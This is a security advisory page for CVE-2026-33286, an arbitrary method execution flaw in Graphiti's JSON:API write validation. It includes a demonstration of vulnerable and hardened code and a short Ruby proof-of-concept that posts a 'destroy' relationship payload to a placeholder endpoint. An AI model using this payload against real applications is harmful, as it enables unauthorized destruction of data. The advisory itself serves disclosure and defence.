Security Vulnerability Report
CVE-2026-33286 CVSS 9.1 CRITICAL

CVE-2026-33286

Published: 2026-03-24 00:16:31
Last Modified: 2026-03-25 17:18:24

Description

Graphiti is a framework that sits on top of models and exposes them via a JSON:API-compliant interface. Versions prior to 1.10.2 have an arbitrary method execution vulnerability that affects Graphiti's JSONAPI write functionality. An attacker can craft a malicious JSONAPI payload with arbitrary relationship names to invoke any public method on the underlying model instance, class or its associations. Any application exposing Graphiti write endpoints (create/update/delete) to untrusted users is affected. The `Graphiti::Util::ValidationResponse#all_valid?` method recursively calls `model.send(name)` using relationship names taken directly from user-supplied JSONAPI payloads, without validating them against the resource's configured sideloads. This allows an attacker to potentially run any public method on a given model instance, on the instance class or associated instances or classes, including destructive operations. This is patched in Graphiti v1.10.2. Users should upgrade as soon as possible. Some workarounds are available. Ensure Graphiti write endpoints (create/update) are not accessible to untrusted users and/or apply strong authentication and authorization checks before any write operation is processed, for example use Rails strong parameters to ensure only valid parameters are processed.
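The mechanism above, as an added example that is not Graphiti's own source: a minimal stand-in for a validation routine that walks the `relationships` object of a write payload and calls `model.send(name)` for each key, shown in the vulnerable shape the advisory describes and in a hardened shape that checks each name against the resource's configured sideloads before anything is sent. The `Post` and `Comment` classes, the `POST_SIDELOADS` allowlist, the helper names and the two payloads are all constructed for this example; the authoritative fix is the upstream patch commit linked in the references.

```ruby
# Added example: a simplified model of the pattern described in CVE-2026-33286,
# NOT Graphiti's own code. Post, Comment, POST_SIDELOADS and the helper names
# are assumptions made for this example.
require 'set'

# Constructed ActiveRecord-style models with the public surface the check uses.
class Comment
  attr_reader :id
  def initialize(id)
    @id = id
  end

  def errors
    []
  end
end

class Post
  attr_reader :comments, :destroyed
  def initialize
    @comments = [Comment.new(1)]
    @destroyed = false
  end

  def errors
    []
  end

  # A destructive public method that a relationship name must never reach.
  def destroy
    @destroyed = true
  end
end

# The relationship names a hypothetical PostResource actually declares as
# sideloads; any other key in a write payload is not a relationship.
POST_SIDELOADS = Set['comments'].freeze

class UnknownSideloadError < StandardError; end

# Vulnerable shape (simplified): every relationship key in the payload is
# passed straight to Model#send, so the request body chooses the method.
def all_valid_vulnerable?(model, relationships)
  return false unless model.errors.empty?
  relationships.each do |name, payload|
    related = model.send(name) # name comes from the request body
    nested = payload.is_a?(Hash) ? payload.fetch('relationships', {}) : {}
    Array(related).each do |record|
      next unless record.respond_to?(:errors) # e.g. `destroy` returned true
      return false unless all_valid_vulnerable?(record, nested)
    end
  end
  true
end

# Hardened shape: a name is only sent to the model after it has been checked
# against the resource's configured sideloads; unknown names are rejected
# before any method runs. (One allowlist is reused for nested records here;
# a real resource graph would consult each resource's own sideloads.)
def all_valid_hardened?(model, relationships, sideloads)
  return false unless model.errors.empty?
  relationships.each do |name, payload|
    unless sideloads.include?(name.to_s)
      raise UnknownSideloadError, "#{name.inspect} is not a configured sideload"
    end
    related = model.send(name)
    nested = payload.is_a?(Hash) ? payload.fetch('relationships', {}) : {}
    Array(related).each do |record|
      return false unless all_valid_hardened?(record, nested, sideloads)
    end
  end
  true
end

# Constructed payloads: the `relationships` object of a JSON:API create
# request as a deserializer would hand it to the validation step.
MALICIOUS_RELATIONSHIPS = { 'destroy' => { 'data' => { 'type' => 'comments', 'id' => '1' } } }.freeze
BENIGN_RELATIONSHIPS = { 'comments' => { 'data' => [{ 'type' => 'comments', 'id' => '1' }] } }.freeze

# Runs one payload through a checker on a fresh Post and reports whether the
# model was destroyed as a side effect of "validation".
def destroyed_by_validation?(checker, relationships)
  post = Post.new
  begin
    checker.call(post, relationships)
  rescue UnknownSideloadError
    # the hardened checker refused the payload; nothing was executed
  end
  post.destroyed
end

VULNERABLE_CHECK = ->(model, rels) { all_valid_vulnerable?(model, rels) }
HARDENED_CHECK = ->(model, rels) { all_valid_hardened?(model, rels, POST_SIDELOADS) }

if __FILE__ == $PROGRAM_NAME
  puts "vulnerable, malicious payload: destroyed=#{destroyed_by_validation?(VULNERABLE_CHECK, MALICIOUS_RELATIONSHIPS)}"
  puts "hardened,   malicious payload: destroyed=#{destroyed_by_validation?(HARDENED_CHECK, MALICIOUS_RELATIONSHIPS)}"
  puts "hardened,   benign payload:    valid=#{all_valid_hardened?(Post.new, BENIGN_RELATIONSHIPS, POST_SIDELOADS)}"
end
```

The point the hardened form makes is that the allowlist check has to happen before `send`, not after: by the time the method has returned, the side effect has already occurred, which is why the vulnerable version still reports the payload as "valid" while the record is gone. Rails strong parameters, mentioned in the description as a workaround, achieve the same thing one layer earlier by dropping unknown relationship keys before the payload reaches the deserializer.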

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:graphiti:graphiti:*:*:*:*:*:ruby:*:* - VULNERABLE
Graphiti < 1.10.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
ruby
require 'net/http'
require 'json'

# Target URL (example placeholder): a Graphiti create endpoint
uri = URI('http://target-url.com/api/v1/posts')
http = Net::HTTP.new(uri.host, uri.port)

# Create a POST request with the JSON:API media type
req = Net::HTTP::Post.new(uri.path, { 'Content-Type' => 'application/vnd.api+json' })

# Malicious JSON:API payload.
# The key 'destroy' inside 'relationships' is treated as a relationship name
# and passed to model.send('destroy') by the vulnerable validation code.
payload = {
  data: {
    type: 'posts',
    attributes: { title: 'Exploit' },
    relationships: {
      # Arbitrary method name to invoke on the model
      'destroy': { data: { type: 'comments', id: '1' } }
    }
  }
}
req.body = payload.to_json

# Send request
response = http.request(req)
puts "Response Code: #{response.code}"
puts "Response Body: #{response.body}"

References

https://github.com/graphiti-api/graphiti/commit/ddb5ad2b69330774bd1a47935ed89a9fe4396a54 (Patch)
https://github.com/graphiti-api/graphiti/releases/tag/v1.10.2 (Product, Release Notes)
https://github.com/graphiti-api/graphiti/security/advisories/GHSA-3m5v-4xp5-gjg2 (Vendor Advisory, Mitigation)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-33286",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-24T00:16:30.683",
    "lastModified": "2026-03-25T17:18:23.687",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Graphiti is a framework that sits on top of models and exposes them via a JSON:API-compliant interface. Versions prior to 1.10.2 have an arbitrary method execution vulnerability that affects Graphiti's JSONAPI write functionality. An attacker can craft a malicious JSONAPI payload with arbitrary relationship names to invoke any public method on the underlying model instance, class or its associations. Any application exposing Graphiti write endpoints (create/update/delete) to untrusted users is affected. The `Graphiti::Util::ValidationResponse#all_valid?` method recursively calls `model.send(name)` using relationship names taken directly from user-supplied JSONAPI payloads, without validating them against the resource's configured sideloads. This allows an attacker to potentially run any public method on a given model instance, on the instance class or associated instances or classes, including destructive operations. This is patched in Graphiti v1.10.2. Users should upgrade as soon as possible. Some workarounds are available. Ensure Graphiti write endpoints (create/update) are not accessible to untrusted users and/or apply strong authentication and authorization checks before any write operation is processed, for example use Rails strong parameters to ensure only valid parameters are processed."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          { "lang": "en", "value": "CWE-913" }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:graphiti:graphiti:*:*:*:*:*:ruby:*:*",
                "versionEndExcluding": "1.10.2",
                "matchCriteriaId": "2C0B7C94-5FBF-428C-B558-7A56DA34C7D2"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/graphiti-api/graphiti/commit/ddb5ad2b69330774bd1a47935ed89a9fe4396a54",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/graphiti-api/graphiti/releases/tag/v1.10.2",
        "source": "[email protected]",
        "tags": ["Product", "Release Notes"]
      },
      {
        "url": "https://github.com/graphiti-api/graphiti/security/advisories/GHSA-3m5v-4xp5-gjg2",
        "source": "[email protected]",
        "tags": ["Vendor Advisory", "Mitigation"]
      }
    ]
  }
}